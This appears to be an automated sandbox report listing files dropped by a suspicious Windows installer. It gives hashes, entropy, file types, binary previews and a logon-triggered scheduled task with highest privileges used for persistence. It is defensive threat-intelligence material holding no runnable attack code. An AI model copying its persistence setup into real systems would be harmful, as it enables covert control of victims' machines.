                                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):56546
                                      Entropy (8bit):7.996966859255975
                                      Encrypted:true
                                      SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                                      MD5:CEA69F993E1CE0FB945A98BF37A66546
                                      SHA1:7114365265F041DA904574D1F5876544506F89BA
                                      SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                                      SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                                      Malicious:false
                                      Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                                      Process:C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:7-zip archive data, version 0.4
                                      Category:dropped
                                      Size (bytes):56546
                                      Entropy (8bit):7.996966859255979
                                      Encrypted:true
                                      SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                                      MD5:4CB8B7E557C80FC7B014133AB834A042
                                      SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                                      SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                                      SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                                      Malicious:false
                                      Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):31890
                                      Entropy (8bit):7.99402458740637
                                      Encrypted:true
                                      SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                                      MD5:8622FC7228777F64A47BD6C61478ADD9
                                      SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                                      SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                                      SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                                      Malicious:false
                                      Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                                      Process:C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:7-zip archive data, version 0.4
                                      Category:dropped
                                      Size (bytes):31890
                                      Entropy (8bit):7.99402458740637
                                      Encrypted:true
                                      SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                                      MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                                      SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                                      SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                                      SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                                      Malicious:false
                                      Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):74960
                                      Entropy (8bit):7.99759370165655
                                      Encrypted:true
                                      SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                                      MD5:950338D50B95A25F494EE74E97B7B7A9
                                      SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                                      SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                                      SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                                      Malicious:false
                                      Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                                      Process:C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:7-zip archive data, version 0.4
                                      Category:dropped
                                      Size (bytes):74960
                                      Entropy (8bit):7.997593701656546
                                      Encrypted:true
                                      SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                                      MD5:059BA7C31F3E227356CA5F29E4AA2508
                                      SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                                      SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                                      SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                                      Malicious:false
                                      Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):29730
                                      Entropy (8bit):7.994290657653607
                                      Encrypted:true
                                      SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                                      MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                                      SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                                      SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                                      SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                                      Malicious:false
                                      Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                                      Process:C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:7-zip archive data, version 0.4
                                      Category:dropped
                                      Size (bytes):29730
                                      Entropy (8bit):7.994290657653608
                                      Encrypted:true
                                      SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                                      MD5:A9C8A3E00692F79E1BA9693003F85D18
                                      SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                                      SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                                      SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                                      Malicious:false
                                      Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                                      Process:C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:7-zip archive data, version 0.4
                                      Category:dropped
                                      Size (bytes):249968
                                      Entropy (8bit):7.9992787830174565
                                      Encrypted:true
                                      SSDEEP:6144:w9hF7VQIqW8AiYr5wInydSC8FpX3HSmdc4YRQltRMHh3XL:w3sYr5wInydSvFpX3yp4YmbWHL
                                      MD5:23244D091AC9F35046F2EFD16EAD0DFA
                                      SHA1:42183A43273BA3F42186FF0862664FE83EED4783
                                      SHA-256:E184AF0EE1919F9C2593B2FC00D7ECC2A32288B0A49D971FDA5AC6007C4CDDE0
                                      SHA-512:76A988EB016B86B3F92F82FCD688DE988D14C5502C04F35E94460ED5168787DECAC9839D86BAB85902CCA7DCB9015875C63613BB1FF007BEA3355E8CF3E2FCEE
                                      Malicious:false
                                      Preview:7z..'....Z.........@...........iG>..(.P.....@..!P.c......)E....;C\........gU..e.w1....J.....lce..).....Q...lVs..........+(..Z.P.v.r...F.q@.j...e1.d.........lL..V..{!]D.;.H.^"..0.......N...+Uo..aw./......K..|C..h..5.y...!.B;.>a+.@z...l$.H..dB.s...S.a..n...F.w...q.c.^j."...L.t.?.*.$Dz+..~rS......@.......ny.._L........^B'.J...P.EZN;h]0..M.$.x.RU.....'`.9/FU..W.,.@&...B.....Y@yX...Z..00.R.......P.&O.P!........2.r....G.LM.k...x.....C"N.w~Fj.....x.P.2)].....d.RP..D<.....h.L..,.....R..Z.q~-:b...$C....X..."u....".jq...0.......{.}v....+K.3M.?<Z~.a..........NM[...O.e.....u.P..D.=heQ.....k.......c.\$......C\.c5L.<.r.H.....iw.0...fWnu."...}...*.y.....W.q.M%.X..v..ew6...gW..j..|.]C..y..d#.?..PF.x...h |.`].g..[.....V..K.........Y..3e..l..,a.%.h1.Dx.q.......t.!h..z[..<f..P..N...H.....V(....J..Cv..I......3.......!N..I.V-.Y2J...rt..b&}..b.<.Xcu..[....z. .k.U7.,...3.w.o\.([JL..U.T.jo...e.h.:M..a.WX.x..Uu2s ......B8..1.F..FD,...H..o..}.3.V. .r.
                                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):63640
                                      Entropy (8bit):6.482810107683822
                                      Encrypted:false
                                      SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                                      MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                                      SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                                      SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                                      SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 9%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):4096
                                      Entropy (8bit):3.3449406240731085
                                      Encrypted:false
                                      SSDEEP:48:dXKLzDlnDPLL6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnDP6whldOVQOj6dKbKsz7
                                      MD5:1EA10B1FA76DC2F1967E53A3FC2D43C4
                                      SHA1:23EADA9D0994D5B9ADE7878493C44551C0B5CF44
                                      SHA-256:2748447EBDE83E35B8984D2993A8331DAC7B7924638502024D8531A07E74C63C
                                      SHA-512:15BF2663CEF3905AE3B13D0A4ABC2E3BBF1FF213BCA5C568641978D5548A7DBED2EC7FC5A00B330287E90DF675EFB804613D4801F6995C7748840CC0BCBA637F
                                      Malicious:false
                                      Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAv
                                      Process:C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                      Category:dropped
                                      Size (bytes):5649408
                                      Entropy (8bit):6.392614480390128
                                      Encrypted:false
                                      SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                      MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                      SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                      SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                      SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):1.1628158735648508
                                      Encrypted:false
                                      SSDEEP:3:Nlllul5mxllp:NllU4x/
                                      MD5:3A925CB766CE4286E251C26E90B55CE8
                                      SHA1:3FA8EE6E901101A4661723B94D6C9309E281BD28
                                      SHA-256:4E844662CDFFAAD50BA6320DC598EBE0A31619439D0F6AB379DF978FE81C7BF8
                                      SHA-512:F348B4AFD42C262BBED07D6BDEA6EE4B7F5CFA2E18BFA725225584E93251188D9787506C2AFEAC482B606B1EA0341419F229A69FF1E9100B01DE42025F915788
                                      Malicious:false
                                      Preview:@...e................................................@..........
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3366912
                                      Entropy (8bit):6.530548291878271
                                      Encrypted:false
                                      SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                      MD5:9902FA6D39184B87AED7D94A037912D8
                                      SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                                      SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                                      SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                      Process:C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):6144
                                      Entropy (8bit):4.720366600008286
                                      Encrypted:false
                                      SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                      MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                      SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                      SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
